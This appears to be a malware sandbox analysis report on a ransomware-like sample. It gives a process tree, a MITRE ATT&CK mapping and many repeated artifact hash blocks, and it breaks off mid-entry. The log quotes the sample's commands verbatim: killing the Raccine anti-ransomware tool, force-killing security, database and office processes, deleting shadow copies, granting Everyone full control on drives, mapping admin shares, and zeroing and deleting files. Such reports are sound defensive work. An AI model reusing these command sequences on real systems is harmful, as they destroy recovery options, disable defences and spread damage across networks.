PID 864 wrote to memory of 1092	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 1092	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 1092	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
1⤵
- Drops startup file
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:864
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1448
- C:\Windows\SysWOW64\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:1584
- C:\Windows\SysWOW64\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1484
- C:\Windows\SysWOW64\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:1688
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:816
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:1444
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:752
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1888
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:1528
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:792
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:1560
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1992
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:912
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:960
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:580
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1092
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:336
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:316
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1316
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1644
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2004
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1432
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:952
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1048
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1740
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:360
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1524
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:556
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1284
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1000
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  PID:1536
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:784
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1988
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1064
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1356
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1616
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:944
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1564
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1692
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1688
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1992
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1148
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:980
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:956
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:1560
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1424
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1432
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1552
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:960
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:112
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:904
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2004
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1164
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:620
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:556
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:576
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:316
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:656
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1760
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1660
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:816
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:564
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:924
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1524
- C:\Windows\SysWOW64\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1168
- C:\Windows\SysWOW64\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1528
- C:\Windows\SysWOW64\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:580
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:916
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:860
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\Users
  2⤵
  PID:1688
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\A$
  2⤵
  PID:1316
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\B$
  2⤵
  PID:1568
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\C$
  2⤵
  PID:1584
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\D$
  2⤵
  PID:1536
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\E$
  2⤵
  PID:1692
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\F$
  2⤵
  PID:1440
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\G$
  2⤵
  PID:1552
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\H$
  2⤵
  PID:960
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\I$
  2⤵
  PID:380
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\J$
  2⤵
  PID:2016
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\K$
  2⤵
  PID:1640
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\L$
  2⤵
  PID:1520
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\M$
  2⤵
  PID:1444
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\N$
  2⤵
  PID:316
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\O$
  2⤵
  PID:1936
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\P$
  2⤵
  PID:360
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\Q$
  2⤵
  PID:1432
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\R$
  2⤵
  PID:556
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\S$
  2⤵
  PID:1784
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\T$
  2⤵
  PID:1548
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\U$
  2⤵
  PID:1528
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\V$
  2⤵
  PID:544
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\W$
  2⤵
  PID:1644
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\X$
  2⤵
  PID:904
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\Y$
  2⤵
  PID:2012
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\127.0.0.1\Z$
  2⤵
  PID:2008
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\Users
  2⤵
  PID:980
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\A$
  2⤵
  PID:1528
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\B$
  2⤵
  PID:1692
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\C$
  2⤵
  PID:556
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\D$
  2⤵
  PID:1556
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\E$
  2⤵
  PID:1276
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\F$
  2⤵
  PID:2008
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\G$
  2⤵
  PID:960
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\H$
  2⤵
  PID:1552
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\N$
  2⤵
  PID:912
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\I$
  2⤵
  PID:1568
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\O$
  2⤵
  PID:380
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\J$
  2⤵
  PID:360
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\P$
  2⤵
  PID:1916
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\K$
  2⤵
  PID:1524
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\Q$
  2⤵
  PID:984
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\L$
  2⤵
  PID:1328
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\R$
  2⤵
  PID:1440
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\M$
  2⤵
  PID:620
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\S$
  2⤵
  PID:544
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\U$
  2⤵
  PID:1444
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\T$
  2⤵
  PID:1564
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\V$
  2⤵
  PID:1548
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\W$
  2⤵
  PID:1436
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\X$
  2⤵
  PID:1904
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\Y$
  2⤵
  PID:1432
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.7.0.32\Z$
  2⤵
  PID:1936
- C:\Windows\SysWOW64\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2080
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:2088
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:2116
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:2156
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
  2⤵
  PID:2168
- - C:\Windows\SysWOW64\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:2196

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "831886393589636291-882625500-13993744441912278337123411194617824916671714969319"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1536

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "9471760731977562789-1900772862-15155541911685167065204783843917239257171056752572"
1⤵
PID:1688

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
